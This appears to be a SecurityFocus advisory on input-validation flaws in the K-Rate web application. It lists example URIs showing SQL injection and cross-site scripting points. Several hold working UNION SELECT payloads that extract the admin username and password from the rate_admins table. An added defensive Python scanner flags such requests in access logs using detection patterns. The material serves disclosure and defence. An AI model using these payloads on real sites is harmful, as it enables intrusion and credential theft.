K-Rate Multiple Input Validation Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim user to follow a malicious URI.

The following example URIs demonstrate the issues ([SQL] and [XSS] mark where the attacker-controlled input is placed):

http://www.example.com/index.php?req=online&show=1[SQL]
http://www.example.com/room/1[SQL]
http://www.example.com/index.php?req=view&user=somegirl&id=2[SQL]&act=vote&image=3&voter=12&vote=3
http://www.example.com/index.php?req=view&user=somegirl&id=2&act=vote&image=3[SQL]&voter=12&vote=3
http://www.example.com/blog/somegirl[SQL]
http://www.example.com/index.php?req=blog_edit&id=1[SQL]
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,version(),4,5,6/*
http://www.example.com/room/-1 union select 1,version(),3,4/*
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,adm_user,4,5,6 from rate_admins where adm_id=1/*
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,adm_pass,4,5,6 from rate_admins where adm_id=1/*
http://www.example.com/index.php?req=view&user=somegirl&id=2&act=vote&image=3&voter=12&vote=3[XSS]
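As an added defensive example (not part of the advisory and not K-Rate code), the check below scans Apache-style access-log lines for requests to the injection points listed above. It assumes that `show`, `id`, `image`, `voter`, `vote` and the `/room/<id>` path segment should be integers and that `user` and `/blog/<user>` should be plain account names; the log lines are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit
# Injection points named in the advisory and the shape each value should have
# (assumption: ids and votes are integers, 'user' is a plain account name).
NUMERIC_PARAMS = {"show", "id", "image", "voter", "vote"}
KINDS = {"numeric": re.compile(r"-?\d+"), "username": re.compile(r"\w{1,32}")}
PATH_RULES = [("room", re.compile(r"^/room/(.*)$"), "numeric"),
              ("blog", re.compile(r"^/blog/(.*)$"), "username")]
SQL_HINT = re.compile(r"union\s+select|/\*|\bversion\(\)", re.IGNORECASE)
HTML_HINT = re.compile(r"[<>\"']")
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3}')

# Constructed Apache-style access-log lines (not from the advisory): two SQL
# injection probes, one benign vote, one vote value carrying HTML.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Mar/2010:10:00:01 +0000] "GET /index.php?req=blog_edit&id=-1%20union%20select%201,2,version(),4,5,6/* HTTP/1.1" 200 512
203.0.113.5 - - [01/Mar/2010:10:00:02 +0000] "GET /room/-1%20union%20select%201,version(),3,4/* HTTP/1.1" 200 480
198.51.100.7 - - [01/Mar/2010:10:00:03 +0000] "GET /index.php?req=view&user=somegirl&id=2&act=vote&image=3&voter=12&vote=3 HTTP/1.1" 200 300
198.51.100.7 - - [01/Mar/2010:10:00:04 +0000] "GET /index.php?req=view&user=somegirl&id=2&act=vote&image=3&voter=12&vote=3%3Cb%3E HTTP/1.1" 200 300
"""

def analyze_request(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    fields = []  # (name, decoded value, expected kind or None)
    for name, rule, kind in PATH_RULES:
        m = rule.match(unquote_plus(parts.path))
        if m:
            fields.append((name, m.group(1), kind))
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        kind = "numeric" if name in NUMERIC_PARAMS else "username" if name == "user" else None
        fields.extend((name, v, kind) for v in values)
    findings = []
    for name, value, kind in fields:
        if kind and not KINDS[kind].fullmatch(value):
            findings.append(f"{name}: {value!r} is not a valid {kind}")
        if SQL_HINT.search(value):
            findings.append(f"{name}: SQL keywords in value")
        if HTML_HINT.search(value):
            findings.append(f"{name}: HTML metacharacters in value")
    return findings

def scan_log(text):
    """Return (client_ip, target, findings) for each log line that trips a check."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (findings := analyze_request(m.group(2))):
            hits.append((m.group(1), m.group(2), findings))
    return hits
```

Running `scan_log(SAMPLE_LOG)` flags the two UNION probes and the vote carrying HTML metacharacters, and leaves the well-formed vote request alone; the same type checks, applied server-side before any query is built, are the fix the advisory's title points at.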
Copyright 2010, SecurityFocus